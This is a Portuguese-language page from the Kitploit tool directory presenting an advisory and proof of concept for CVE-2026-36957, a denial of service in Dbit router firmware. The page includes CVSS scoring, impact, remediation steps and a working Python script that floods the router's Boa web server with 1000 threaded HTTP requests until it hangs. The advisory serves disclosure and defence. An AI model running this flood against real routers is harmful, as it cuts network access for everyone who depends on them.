Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-36957 — Prova de conceito para CVE-2026-36957, uma vulnerabilidade de negação de serviço no firmware do roteador Dbit via inundação HTTP no servidor web Boa, causando esgotamento de recursos e travamento do sistema. | Kitploit
Ferramentas/GitHubGitHub/kirubel-cve/cve-2026-36957
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de Penetração
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Prova de conceito para CVE-2026-36957, uma vulnerabilidade de negação de serviço no firmware do roteador Dbit via inundação HTTP no servidor web Boa, causando esgotamento de recursos e travamento do sistema.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-36957: Negação de Serviço via Inundação HTTP no Servidor Web Boa

ID CVE: CVE-2026-36957 Data: 2026-04-29 Descobridor: Kirubel Solomne Fornecedor: Shenzhen Dibit Network Equipment Co., Ltd. Produto: Roteador Dbit Versão do Firmware: V1.0.0 CWE: CWE-400 - Consumo de Recursos Não Controlado


Descrição

O firmware V1.0.0 do roteador Dbit é vulnerável a Negação de Serviço por meio do manipulador de URI do servidor web Boa. Ao enviar uma inundação de alto volume de solicitações HTTP GET para URIs inexistentes, um atacante pode esgotar recursos críticos do sistema, incluindo descritores de arquivo e buffers de memória. Isso resulta em um deadlock do kernel ou travamento do sistema que desativa o portal de gerenciamento web e todas as capacidades de roteamento.


Pontuação CVSS

Pontuação CVSS v3.1: 7.5 (Alta) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MétricaValor
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
Impacto na ConfidencialidadeNenhum
Impacto na IntegridadeNenhum
Impacto na DisponibilidadeAlto

Prova de Conceito

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Comportamento Esperado: O servidor deve limitar conexões e permanecer estável. Comportamento Real: A interface web do roteador fica sem resposta; requer reinicialização manual.


Impacto

  • Perda total da interface de gerenciamento web
  • Interrupção de todas as capacidades de roteamento
  • Requer reinicialização manual para restaurar o serviço
  • Indisponibilidade de rede para todos os dispositivos conectados

Remediação

  • Implementar limitação de taxa de conexões no servidor web Boa
  • Adicionar temporizador de watchdog para recuperação de estados de deadlock
  • Limitar o número máximo de conexões simultâneas por IP

Cronograma de Divulgação

DataEvento
2026-04-29Vulnerabilidade descoberta
2026-04-29Relatada à MITRE
2026-04-29CVE-2026-36957 atribuído
2026-04-29Divulgação pública

Referências

  • MITRE CVE-2026-36957
  • CWE-400
  • Site do Fornecedor
Baixar ferramenta